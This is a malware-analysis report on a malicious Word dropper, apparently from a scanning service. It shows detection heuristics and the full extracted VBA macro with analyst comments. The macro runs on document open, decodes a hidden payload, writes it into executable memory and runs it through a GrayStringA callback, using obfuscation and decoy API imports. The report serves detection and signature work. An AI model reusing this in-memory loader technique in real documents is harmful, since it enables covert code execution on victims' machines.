MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical-severity ClamAV signature identified the file as Doc.Dropper.ZwMacros-6057750-0, indicating dropper functionality. The presence of VBA macros, specifically a Document_Open macro, strongly suggests an attempt to execute malicious code automatically when the document is opened. The VBA code is obfuscated but includes calls to functions that likely facilitate the download and execution of a secondary payload, consistent with dropper behavior.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 — severity: critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected — severity: medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — severity: low — OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script: `Attribute VB_Customizable = True`, `Private Sub Document_Open()`, `Dim cestoda As String`
-
Embedded URL — severity: info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven below are XMP/RDF schema namespace identifiers of the kind carried in embedded image metadata, not network indicators.
- http://ns.adobe.com/xap/1.0/ — in document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns# — in document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/ — in document text (OLE body)
- http://purl.org/dc/elements/1.1/ — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/ — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — in document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef# — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 8e13920b17f64a92a944215443499a84d96b6e911b99f686ee63229d221bfb63) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13352 bytes |
Preview script — first 1,000 lines of the extracted script
' --- Module "ThisDocument" (the document's own class module) ---
' Stream attribute lines as decoded by oletools.olevba; VB_Customizable = True
' is the line the OLE_VBA_DOCOPEN finding quotes together with Document_Open.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-execution entry point: Word invokes Document_Open as soon as the
' document is opened (this is the OLE_VBA_DOCOPEN finding above). The only
' statement that does anything is the bare call to saucebox; the unused
' string variables, the numeric assignments and the SYD() depreciation call
' are filler whose results are never read.
Private Sub Document_Open()
Dim cestoda As String
Dim plantae As String
cineration = "blurt"
circaea = "be" & "rrie" & "d"
' Hand-off to the orchestrator defined later in this module.
saucebox
adjective = 5
agelong = 274
nigerian = 34919
capitulation = 588480
capitulation = SYD(capitulation, nigerian, agelong, adjective)
End Sub
' Thin wrapper around footfault, which module beelzebub declares as an alias
' of ntdll!NtWriteVirtualMemory. The arguments map straight through:
'   notion    -> destination address (copied into buttondown)
'   disjoint  -> source buffer       (copied into beardless)
'   hidebound -> byte count          (copied into disturbed)
' ladle is computed as 53 - 54 = -1, the current-process pseudo-handle, so
' every call writes into Word's own address space. hygroscopic receives the
' bytes-written count and is never read. The function never assigns its own
' name, so callers get an Empty return value; the Math.Round/Rnd/NPer lines
' and the `venison = venison` self-assignment are filler. Locals are declared
' under both #If Win64 branches so the module compiles on either bitness.
Function agrostis(notion, disjoint, hidebound)
#If Win64 Then
Dim mistral As Variant
Dim deposit As Variant
Dim ladle As LongPtr
Dim buttondown As LongPtr
Dim hygroscopic As LongPtr
Dim lethargical As String
Dim beardless As LongPtr
Dim disturbed As LongPtr
#Else
Dim buttondown As Long
Dim redemption As Long
Dim ladle As Long
Dim austenitic As Long
Dim beardless As Long
Dim gaiter As String
Dim hygroscopic As Long
Dim press As Byte
Dim disturbed As Long
Dim pseudonym As Variant
Dim anaesthetic As Byte
#End If
' Filler: unused arithmetic, Rnd() and NPer() calls.
catenary = Math.Round(109)
rottenness = venison
buttondown = notion
disturbed = hidebound
bandsman = Rnd(327)
beardless = disjoint
tracheophyta = 19
malicious = 36563
cheery = 599924
detectable = NPer(66 / 541, tracheophyta, -37748, cheery, 0)
bandsman = bandsman Or 245
' -1: current-process pseudo-handle.
ladle = 53 - 54
' NtWriteVirtualMemory(-1, notion, disjoint, hidebound, &hygroscopic)
footfault ByVal ladle, buttondown, beardless, disturbed, hygroscopic
venison = venison
End Function
' Benign-looking Word automation (chapter numbers in the primary page header).
' Nothing in the listing calls it; presumably present to make the project
' resemble an ordinary document macro.
Sub add()
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers
.IncludeChapterNumber = True
.ChapterPageSeparator = wdSeparatorEnDash
End With
End Sub
' Orchestrator, called from Document_Open. With the filler stripped, the
' chain is:
'   1. Read the page count, store it in embiotocidae.davids.Value and take
'      intervene = embiotocidae.davids.SelectedItem. embiotocidae is the
'      UserForm module at the end of the listing; davids is presumably one of
'      its controls — the form's own code is not in this listing, so this is
'      unconfirmed.
'   2. dilatory = Right(intervene.Name, 5844): the encoded payload lives in
'      the Name property of a form item, 5844 characters long (brachiation's
'      loop bound of 5843 matches this length).
'   3. confront = beelzebub.brachiation(dilatory): custom base64 decode.
'   4. lisu = antelope(confront): allocate executable memory, copy the
'      decoded bytes into it and return the base address.
'   5. invader = lisu + cetacea (cetacea = 1312 on Win64, 3154 on 32-bit) and
'      manor = aimlessly(..., invader, ...): aimlessly is the alias of
'      user32!GrayStringA, whose third parameter is a callback function
'      pointer, so the API call transfers control into the freshly written
'      buffer at that offset.
' Everything else (string literals, NPer()/SYD() calls, spare Dim statements)
' is dead code. Detection angle: a Word process calling
' NtAllocateVirtualMemory with PAGE_EXECUTE_READWRITE followed by a
' GrayStringA call whose callback address is outside any loaded image.
Sub saucebox()
Dim nyamwezi As Variant
Dim criminalism As Variant
' Step 1: touch the form so its SelectedItem can be read.
dogtrot = ThisDocument.ComputeStatistics(wdStatisticPages)
embiotocidae.davids.Value = dogtrot + 9
maundering = "airspace"
editorial = "bi" & "as"
skindiver = "distraction"
Set intervene = embiotocidae.davids.SelectedItem
anomaly = 2
pickleherring = 360
inhabitancy = 53914
apidae = 184808
apidae = SYD(apidae, inhabitancy, pickleherring, anomaly)
' Step 2: the encoded payload is the last 5844 characters of the item name.
baeotic = intervene.Name
episode = 5844
dilatory = Right(baeotic, episode)
' Step 3: decode (see brachiation in module beelzebub).
confront = beelzebub.brachiation(dilatory)
mists = 113
pileup = 6743
discipleship = 124597
firstclass = NPer(62 / 551, mists, -37124, discipleship, 0)
monegasque = "leg" & "islator"
nothosauria = "an" & "them" & "ion"
#If Win64 Then
Dim lowlander As String
Dim lisu As LongPtr
Dim invader As LongPtr
Dim pneumogastric As Long
#Else
Dim entellus As Byte
Dim invader As Long
Dim ductile As Long
Dim lisu As Long
#End If
adjective = 0
inordinately = "burgee"
bolus = "extraterrestrial"
airfield = 4096
moremajorum = 5
dated = 25229
spain = 169900
toxiferous = NPer(32 / 652, moremajorum, -6721, spain, 1)
rapacity = "drawler"
mirrored = "anticyclone"
ceremonially = 111
reticulum = 24926
ochna = 142953
delphi = NPer(81 / 565, ceremonially, -21610, ochna, 0)
gregarine = confront
installment = "avant"
' Step 4: allocate executable memory and copy the decoded bytes into it.
lisu = antelope(gregarine)
brittle = "blissus"
gynogenesis = "oxgoad"
#If Win64 Then
Dim burgoyne As Variant
Dim erysiphe As LongPtr
chlorothiazide = "nomia"
average = "birdman"
bedgown = "tegumentary"
Dim despiciency As LongPtr
' 93 + 90 + 109 + 1020 = 1312: entry offset into the buffer on 64-bit.
cetacea = 93 + 90 + 109 + 1020
#Else
metalanguage = "moider"
urdu = "he" & "rmet" & "ic"
Dim erysiphe As Long
aquating = 62 - 34 + 467
Dim despiciency As Long
' 495 + 2659 = 3154: entry offset into the buffer on 32-bit.
cetacea = aquating + 2659
#End If
Dim aquatinta As String
Dim chemotherapy As Byte
erysiphe = 2 + 50 - 52
' Step 5: callback address = allocation base + bitness-specific offset.
invader = lisu + cetacea
despiciency = 99 - 91 - 14 + 7
' GrayStringA(...) with invader as the lpOutputFunc callback.
manor = aimlessly(despiciency, despiciency, invader, erysiphe, despiciency, erysiphe, erysiphe, erysiphe, erysiphe)
nidicolous = 3
biped = 323
impregnate = 42118
here = 354654
here = SYD(here, impregnate, biped, nidicolous)
End Sub
' Allocates an executable buffer in the current process, copies the decoded
' payload into it and returns the buffer's base address. functionalism is
' the Variant that holds the decoded string produced by brachiation.
'   dexter(...) is the alias of ntdll!NtAllocateVirtualMemory:
'     ProcessHandle  = bewitchingly = 99 - 100 = -1 (current process)
'     BaseAddress    = autoerotic (0 on entry; receives the chosen address)
'     ZeroBits       = amygdala = 0
'     RegionSize     = kook = 54 + 9682 = 9736 bytes
'     AllocationType = cogitate = 4096 (0x1000, MEM_COMMIT)
'     Protect        = obituary = 64 (0x40, PAGE_EXECUTE_READWRITE)
'   The first agrostis call copies conima bytes (8 on Win64, 4 otherwise —
'     a pointer's size) from VarPtr(functionalism) + 8 into llud. Offset 8
'     is the data field of a VARIANT, so llud presumably ends up holding the
'     raw pointer to the decoded bytes — TODO confirm on a live sample.
'   The second agrostis call (NtWriteVirtualMemory) writes 4384 bytes from
'     that pointer into the new allocation.
' The NPer()/Fix() calls and `rottenness = venison` are filler. The guard is
' written `#If Win64 > 0 Then`, which behaves like `#If Win64 Then`.
Function antelope(functionalism)
Dim clinking As Variant
Dim dishing As Variant
Dim acceptance As Variant
Dim menses As Long
#If Win64 > 0 Then
Dim cuspidation As Long
Dim llud As LongPtr
' 3 - 114 - 83 + 202 = 8 bytes (64-bit pointer).
conima = 3 - 114 - 83 + 202
Dim autoerotic As LongPtr
Dim meson As Byte
Dim niveous As String
Dim kook As LongPtr
Dim compensation As String
#Else
Dim hap As Integer
Dim llud As Long
' 2 + 32 - 30 = 4 bytes (32-bit pointer).
conima = 2 + 32 - 30
Dim autoerotic As Long
Dim pyromancy As Variant
Dim kook As Long
Dim butadiene As Long
Dim hb As String
#End If
' Copy the Variant's data pointer into llud.
mum = VarPtr(llud)
dormie = agrostis(mum, VarPtr(functionalism) + 8, conima)
' -1: current process.
bewitchingly = 99 - 100
autoerotic = 0
amygdala = 0
' 9736-byte region.
kook = 54 + 9682
' MEM_COMMIT / PAGE_EXECUTE_READWRITE.
cogitate = 4096
obituary = 64
disapprobation = dexter(ByVal bewitchingly, autoerotic, ByVal amygdala, kook, ByVal cogitate, ByVal obituary)
bandsman = Fix(70)
rottenness = venison
' Write 4384 decoded bytes into the allocation.
agrostis autoerotic, llud, 4384
curculation = 113
suspicion = 17510
dorado = 104745
bitewing = NPer(82 / 384, curculation, -23107, dorado, 1)
antelope = autoerotic
End Function
Attribute VB_Name = "beelzebub"
' --- Module "beelzebub": the API import table ---
' Every Win32/NT API is declared under a random-word alias, once per bitness.
' The song-lyric comments between the declarations are padding; they are
' left untouched because they are useful signature material.
' Aliases that are actually called elsewhere in the listing:
'   dexter     -> ntdll!NtAllocateVirtualMemory  (called from antelope)
'   footfault  -> ntdll!NtWriteVirtualMemory     (called from agrostis)
'   aimlessly  -> user32!GrayStringA             (called from saucebox)
' The Shell32/Shlwapi/Kernel32 imports (SHGetDesktopFolder,
' SHChangeNotification_Lock, SHGetSettings, PathFileExists, ReadConsoleW)
' are declared but never called: decoys. Two further signature anchors:
' the trailing space in Lib "Ntdll.dll " on both NtWriteVirtualMemory lines,
' and the NtAllocateVirtualMemory declarations whose fourth parameter is
' literally named mownByVal (64-bit) / bakingByVal (32-bit), a generator
' artefact that turns the intended ByVal into a parameter name.
'
' Chasing after danger, making my heart race, woah
#If Win64 Then
'
'
Public Declare PtrSafe Function spiny Lib "Shell32.dll" Alias "SHGetDesktopFolder" (hansards As LongPtr)
'
' Chasing the stars, chasing the stars
Public Declare PtrSafe Function distraught Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (chiococca As LongPtr, saporific As Any,moneys As LongPtr, intensive As Any) As Boolean
' Love don't come easy at all
' Maybe in a million miles, on a highway through the skies
Public Declare PtrSafe Function footfault Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal skin As Any, ByVal fit As Any, ByVal alldevouring As Any, ByVal autotypic As Any, ByVal altar As Any) As LongPtr
'
' Tell me, is this freedom, baby?
Public Declare PtrSafe Function deepdyed Lib "Shell32.dll" Alias "SHGetSettings" (aiding As LongPtr,brisbane As LongPtr) As LongPtr
'
'
Public Declare PtrSafe Function barney Lib "Shlwapi.dll" Alias "PathFileExists" (caesarem As LongPtr) As LongPtr
'
' Someday soon, we'll be together
Public Declare PtrSafe Function stayathome Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal damselfly As LongPtr,microstomus As LongPtr,breathless As LongPtr,activator As LongPtr,dont As LongPtr) As Boolean
' Love don't come easy at all
'
Public Declare PtrSafe Function aimlessly Lib "User32.dll" Alias "GrayStringA" ( ByVal alteration As Any, ByVal chumminess As Any, ByVal deposition As Any, ByVal conservator As Any, ByVal presbyopia As Any, ByVal tenuere As Any, ByVal swithins As Any, ByVal dentine As Any, ByVal casquet As Any) As Long
'
' Maybe in a million miles, on a highway through the skies
Public Declare PtrSafe Function dexter Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (roster As LongPtr, glitz As LongPtr, ByVal borated As LongPtr,mownByVal As LongPtr, reelection As LongPtr, ByVal curtailment As LongPtr) As LongPtr
'
' Maybe in a million miles, on a highway through the skies
'
' Maybe in a million miles, on a highway through the skies
#Else
'
' Maybe in a million miles, on a highway through the skies
Public Declare Function accompaniment Lib "Shell32.dll" Alias "SHGetDesktopFolder" (spatangoida As Long)
'
' Maybe in a million miles, on a highway through the skies
Public Declare Function occupy Lib "Shell32.dll" Alias "SHGetSettings" (neckband As Long, milieu As Long) As Long
' Chasing the stars, chasing the stars
' Baby I'm yours, baby I'm yours
Public Declare Function dexter Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (quisque As Long, scallopine As Long, ByVal leptosporangium As Long, bakingByVal As Long, augustine As Long, ByVal bing As Long) As Long
' Maybe in a million miles, on a highway through the skies
'
Public Declare Function aimlessly Lib "User32.dll" Alias "GrayStringA" (ByVal clarence As Any, ByVal culpable As Any, ByVal amputate As Any, ByVal newly As Any, ByVal amrinone As Any, ByVal grubstreet As Any, ByVal mayaca As Any, ByVal amphiuma As Any, ByVal khaki As Any) As Long
' I miss you so much, I miss you so much
' Let me escape in your arms
Public Declare Function footfault Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal assagai As Any, ByVal piscine As Any, ByVal brutal As Any, ByVal adverse As Any, ByVal terroe As Any) As Long
'
' I miss you so much, I miss you so much
Public Declare Function juramentado Lib "Shlwapi.dll" Alias "PathFileExists" (belamcanda As Long) As Long
'
' Someday soon, we'll be together
Public Declare Function tridental Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (pretty As Long, catechismal As Any, constraint As Long, constrict As Any) As Boolean
'
' Baby I'm yours, baby I'm yours
Public Declare Function probatum Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal gerbillus As Long, guan As Long, aesop As Long, pickax As Long, inextinguishable As Long) As Boolean
' Maybe on the dark side we can be together, be together
' Let me escape in your arms
' Maybe if the stars align, maybe if our worlds collide
'
#End If
' Maybe on the dark side we can be together, be together
' Chasing after danger, making my heart race, woah
' Builds the reverse lookup table for the standard base64 alphabet and
' returns it as a 256-entry Byte array indexed by ASCII code:
'   'A'..'Z' (65..90)  -> 0..25   (literarum - 65)
'   '0'..'9' (48..57)  -> 52..61  (literarum + 4)
'   'a'..'z' (97..122) -> 26..51  (literarum - 71)
'   '/' (47) -> 63,  '+' (43) -> 62
' Every other entry stays 0. Consumed by brachiation as parulidae.
Function orientate()
Dim boatman(255) As Byte
literarum = 65
Do
boatman(literarum) = literarum - 65
literarum = literarum + 1
Loop Until literarum = 91
literarum = 48
Do
boatman(literarum) = literarum + 4
literarum = literarum + 1
Loop Until literarum = 58
literarum = 97
Do
boatman(literarum) = literarum - 71
literarum = literarum + 1
Loop Until literarum = 123
boatman(47) = 63
literarum = 43
boatman(literarum) = 62
orientate = boatman
End Function
' Benign-looking Word range manipulation. Not called anywhere in the
' listing; presumably decoy code.
Sub dup()
Dim Range1 As Range, Range2 As Range
Set Range1 = Selection.Range.Duplicate
Set Range2 = ActiveDocument.Bookmarks(1).Range
Range2.Paragraphs(1).Range = Range2
End Sub
' Arithmetic dispatcher used by brachiation so that the operators never
' appear inline: selector 15 -> integer division (\), 25 -> bitwise And,
' 33 -> multiplication. Any other selector leaves the return value Empty.
Function couplet(dishabille, activism, pteriidae)
Select Case pteriidae
Case 15
couplet = dishabille \ activism
Case 25
couplet = dishabille And activism
Case 33
couplet = dishabille * activism
End Select
End Function
' Custom base64 decoder for the payload string pulled from the form item
' name. nailery is the 5844-character encoded string; the decoded bytes are
' returned through the String return value (assigned from a 6966-entry Byte
' array). With the filler removed the algorithm is:
'   1. amen = StrConv(nailery, vbFromUnicode): one byte per character.
'   2. extrajudicial = Sqr(RGB(0, 1, 0)) = Sqr(256) = 16. Bytes at even
'      indices get +16, bytes at odd indices +15 — presumably undoing a
'      per-position shift applied to the alphabet before ordinary base64.
'   3. Weight tables: aerosol(i) = i * 64, chivalric(i) = i * 4096,
'      pachycephala(i) = i * 262144 (64^1, 64^2, 64^3; protoctista = 64,
'      onsite = 4096, postal = 262144 after the arithmetic). parulidae is
'      the alphabet lookup from orientate.
'   4. Main loop: clue advances 4 per iteration (the `clue = clue + 3`
'      inside the body plus Next). dwarf packs four 6-bit values into 24
'      bits and the three output bytes are
'        (dwarf And &HFF0000) \ &H10000   (chanted = 16711680, farrow = 65536)
'        (dwarf And &HFF00)   \ &H100     (childishly = 65280, pichi = 256)
'         dwarf And &HFF                  (eater = 255)
'      computed through couplet's operator codes 25 (And) and 15 (\).
'      paltriness = 3 and paunch = 2 are the index offsets.
' The SYD()/NPer()-style calls, the jeter/venison/catenary assignments and
' the unused Dims are filler. The literal constants 16711680, 65280 and
' 16515072 (unused) are convenient anchors for a signature.
Function brachiation(nailery) As String
venison = jeter
venison = venison
Dim arctocebus As Long
Dim antihistamine As Integer
Dim aerosol(63) As Long
Dim inconsequential(6965) As Byte
Dim chard As Integer
catenary = catenary * 4
Dim chivalric(63) As Long
Dim exemplar As Long
Dim economize As Variant
Dim pachycephala(63) As Long
Dim colima As Long
Dim clue As Long
Dim entering As String
Dim brash As String
Dim dwarf As Long
Dim bimonthly() As Byte
bonesetter = 16515072
Dim hake As Long
' 65536 = &H10000, 16711680 = &HFF0000.
farrow = 65536
chanted = 16711680
Dim noisily As Byte
' 4096 and 262144: base64 digit weights 64^2 and 64^3.
onsite = 114 - 101 + 4083
adenium = 15 + 55 - 90 + 258068
' 256 = &H100, 65280 = &HFF00.
pichi = 256
childishly = 65280
postal = 104 - 26 + 262066
civile = 40 - 87 + 4079
Dim patrick As Variant
' 255 = &HFF.
eater = 1 + 24 - 121 + 351
myopic = 63
' 64: weight of the third base64 digit.
protoctista = 71 - 41 + 34
Dim alteri As Variant
allocation = 0
forepaw = 5843
Dim amen() As Byte
Dim papaya As Long
' Step 1: string -> byte array.
amen = VBA.Strings.StrConv(nailery, vbFromUnicode)
Dim consonantal As Integer
nauseate = 5
embarrass = 223
appropinquate = 39183
dividable = 314905
dividable = SYD(dividable, appropinquate, embarrass, nauseate)
' Loop bound: 5843 = last index of the 5844-character input.
lignified = 5843
' Step 2: Sqr(256) = 16.
extrajudicial = Sqr(RGB(0, 1, 0))
For dilleniaceae = 0 To lignified
If dilleniaceae Mod 2 = 0 Then
amen(dilleniaceae) = amen(dilleniaceae) + extrajudicial
Else
amen(dilleniaceae) = amen(dilleniaceae) + extrajudicial - 1
End If
Next dilleniaceae
throughout = 6
simply = 169
phyllostachys = 53523
excrescence = 411554
excrescence = SYD(excrescence, phyllostachys, simply, throughout)
antihistamine = 0
polity = 2 + 60 - 62
acknowledgeable = 25 + 18
' Step 3: alphabet lookup and digit weight tables.
parulidae = orientate
For arctocebus = 0 To 63
aerosol(arctocebus) = couplet(arctocebus, protoctista, 33)
chivalric(arctocebus) = couplet(arctocebus, onsite, 33)
pachycephala(arctocebus) = couplet(arctocebus, postal, 33)
Next arctocebus
potboy = 5
metuit = 184
investigate = 57837
caeca = 120874
caeca = SYD(caeca, investigate, metuit, potboy)
bimonthly = amen
rags = 4
vaporer = 5
accouterments = 388
unguent = 50245
receiving = 161630
receiving = SYD(receiving, unguent, accouterments, vaporer)
paltriness = 68 - 65
jeter = "redbone"
catenary = Math.Round(81)
nab = paltriness + 1
paunch = 2
' Step 4: four encoded bytes -> three decoded bytes per iteration.
For clue = 0 To lignified
snowflake = bimonthly(clue)
steeplechaser = bimonthly(clue + 2)
dwarf = pachycephala(parulidae(snowflake)) _
+ chivalric(parulidae(bimonthly(clue + 1))) + aerosol(parulidae(steeplechaser)) + parulidae(bimonthly(clue + paltriness))
arctocebus = couplet(dwarf, chanted, 25)
inconsequential(exemplar) = couplet(arctocebus, farrow, 15)
arctocebus = couplet(dwarf, childishly, 25)
inconsequential(exemplar + 1) = couplet(arctocebus, pichi, 15)
inconsequential(exemplar + paunch) = couplet(dwarf, eater, 25)
exemplar = exemplar + paunch + 1
' Together with Next this steps clue by 4.
clue = clue + 3
Next
brachiation = inconsequential
End Function
' Returns the Unicode code point of the argument's first character.
' Not referenced anywhere else in the listing.
Function articulo(clitoral)
articulo = AscW(clitoral)
End Function
' --- Module "embiotocidae" (UserForm; the VB_Base GUID pair marks a form
' designer module) ---
' Only the attribute header is present in this listing; the form's control
' definitions are not. saucebox reads embiotocidae.davids.Value and
' embiotocidae.davids.SelectedItem.Name, so the encoded payload is
' presumably stored in a control of this form rather than in the macro
' source — worth keeping in mind when carving the sample for the payload.
Attribute VB_Name = "embiotocidae"
Attribute VB_Base = "0{B8939E0F-65DD-42DB-A6A0-A250446B3213}{E380B6C1-68A6-414F-9604-B55C4E3971A4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False